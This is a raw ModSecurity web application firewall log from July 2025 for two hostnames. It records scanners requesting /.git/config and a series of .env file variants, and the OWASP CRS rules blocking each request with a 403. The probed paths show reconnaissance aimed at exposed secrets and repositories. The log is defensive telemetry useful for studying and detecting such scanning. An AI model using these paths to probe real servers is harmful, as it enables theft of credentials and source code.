[Fri Jul 18 20:52:44.866002 2025] [:error] [pid 1283274] [client 195.178.110.68:63092] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqX_AOTpDpxm4E0Bx_VhwAAAAo"]
[Fri Jul 18 20:52:44.866262 2025] [:error] [pid 1283274] [client 195.178.110.68:63092] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqX_AOTpDpxm4E0Bx_VhwAAAAo"]
[Fri Jul 18 20:52:44.866452 2025] [:error] [pid 1283274] [client 195.178.110.68:63092] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHqX_AOTpDpxm4E0Bx_VhwAAAAo"]
[Fri Jul 18 23:40:29.166025 2025] [:error] [pid 1283268] [client 195.178.110.68:55285] [client 195.178.110.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHq_TYdKDZtevH3CtN42MwAAAAk"]
[Fri Jul 18 23:40:29.166247 2025] [:error] [pid 1283268] [client 195.178.110.68:55285] [client 195.178.110.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHq_TYdKDZtevH3CtN42MwAAAAk"]
[Fri Jul 18 23:40:29.166441 2025] [:error] [pid 1283268] [client 195.178.110.68:55285] [client 195.178.110.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHq_TYdKDZtevH3CtN42MwAAAAk"]
[Sat Jul 19 03:17:48.786558 2025] [:error] [pid 1291452] [client 185.231.155.84:55486] [client 185.231.155.84] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHryPCntHLpcA8yKYCxZ_QAAAAA"]
[Sat Jul 19 03:17:48.786879 2025] [:error] [pid 1291452] [client 185.231.155.84:55486] [client 185.231.155.84] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHryPCntHLpcA8yKYCxZ_QAAAAA"]
[Sat Jul 19 03:17:48.787050 2025] [:error] [pid 1291452] [client 185.231.155.84:55486] [client 185.231.155.84] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHryPCntHLpcA8yKYCxZ_QAAAAA"]
[Sat Jul 19 06:04:13.181292 2025] [:error] [pid 1292406] [client 155.94.155.152:59450] [client 155.94.155.152] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHsZPSj6_k7tH_HVzcaerwAAAAY"]
[Sat Jul 19 06:04:13.181514 2025] [:error] [pid 1292406] [client 155.94.155.152:59450] [client 155.94.155.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHsZPSj6_k7tH_HVzcaerwAAAAY"]
[Sat Jul 19 06:04:13.181689 2025] [:error] [pid 1292406] [client 155.94.155.152:59450] [client 155.94.155.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aHsZPSj6_k7tH_HVzcaerwAAAAY"]
[Sat Jul 19 07:40:10.947179 2025] [:error] [pid 1291456] [client 46.166.162.40:48484] [client 46.166.162.40] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHsvun9HRTr3KxPrbnNo6wAAAAQ"]
[Sat Jul 19 07:40:10.947464 2025] [:error] [pid 1291456] [client 46.166.162.40:48484] [client 46.166.162.40] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHsvun9HRTr3KxPrbnNo6wAAAAQ"]
[Sat Jul 19 07:40:10.947620 2025] [:error] [pid 1291456] [client 46.166.162.40:48484] [client 46.166.162.40] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHsvun9HRTr3KxPrbnNo6wAAAAQ"]
[Sat Jul 19 08:37:05.661122 2025] [:error] [pid 1291454] [client 198.55.98.68:44676] [client 198.55.98.68] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHs9EeDdkK46bMpKiKRDdAAAAAI"]
[Sat Jul 19 08:37:05.661401 2025] [:error] [pid 1291454] [client 198.55.98.68:44676] [client 198.55.98.68] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHs9EeDdkK46bMpKiKRDdAAAAAI"]
[Sat Jul 19 08:37:05.661588 2025] [:error] [pid 1291454] [client 198.55.98.68:44676] [client 198.55.98.68] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aHs9EeDdkK46bMpKiKRDdAAAAAI"]
[Sat Jul 19 09:36:53.680135 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHtLFVPCWV3WY3PgjaNjAQAAAAw"]
[Sat Jul 19 09:36:53.680453 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHtLFVPCWV3WY3PgjaNjAQAAAAw"]
[Sat Jul 19 09:36:53.680654 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aHtLFVPCWV3WY3PgjaNjAQAAAAw"]
[Sat Jul 19 09:36:53.702646 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aHtLFVPCWV3WY3PgjaNjAgAAAAw"]
[Sat Jul 19 09:36:53.702892 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aHtLFVPCWV3WY3PgjaNjAgAAAAw"]
[Sat Jul 19 09:36:53.703058 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aHtLFVPCWV3WY3PgjaNjAgAAAAw"]
[Sat Jul 19 09:36:53.725190 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aHtLFVPCWV3WY3PgjaNjAwAAAAw"]
[Sat Jul 19 09:36:53.725450 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aHtLFVPCWV3WY3PgjaNjAwAAAAw"]
[Sat Jul 19 09:36:53.725630 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev"] [unique_id "aHtLFVPCWV3WY3PgjaNjAwAAAAw"]
[Sat Jul 19 09:36:53.747622 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aHtLFVPCWV3WY3PgjaNjBAAAAAw"]
[Sat Jul 19 09:36:53.747867 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aHtLFVPCWV3WY3PgjaNjBAAAAAw"]
[Sat Jul 19 09:36:53.748049 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aHtLFVPCWV3WY3PgjaNjBAAAAAw"]
[Sat Jul 19 09:36:53.770120 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aHtLFVPCWV3WY3PgjaNjBQAAAAw"]
[Sat Jul 19 09:36:53.770401 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aHtLFVPCWV3WY3PgjaNjBQAAAAw"]
[Sat Jul 19 09:36:53.770621 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aHtLFVPCWV3WY3PgjaNjBQAAAAw"]
[Sat Jul 19 09:36:53.792814 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aHtLFVPCWV3WY3PgjaNjBgAAAAw"]
[Sat Jul 19 09:36:53.793058 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aHtLFVPCWV3WY3PgjaNjBgAAAAw"]
[Sat Jul 19 09:36:53.793256 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aHtLFVPCWV3WY3PgjaNjBgAAAAw"]
[Sat Jul 19 09:36:53.815533 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aHtLFVPCWV3WY3PgjaNjBwAAAAw"]
[Sat Jul 19 09:36:53.815792 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aHtLFVPCWV3WY3PgjaNjBwAAAAw"]
[Sat Jul 19 09:36:53.815979 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aHtLFVPCWV3WY3PgjaNjBwAAAAw"]
[Sat Jul 19 09:36:53.838095 2025] [:error] [pid 1292412] [client 185.177.72.16:65490] [client 185.177.72.16] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "aHtLFVPCWV3WY3PgjaNjCAAAAAw"]
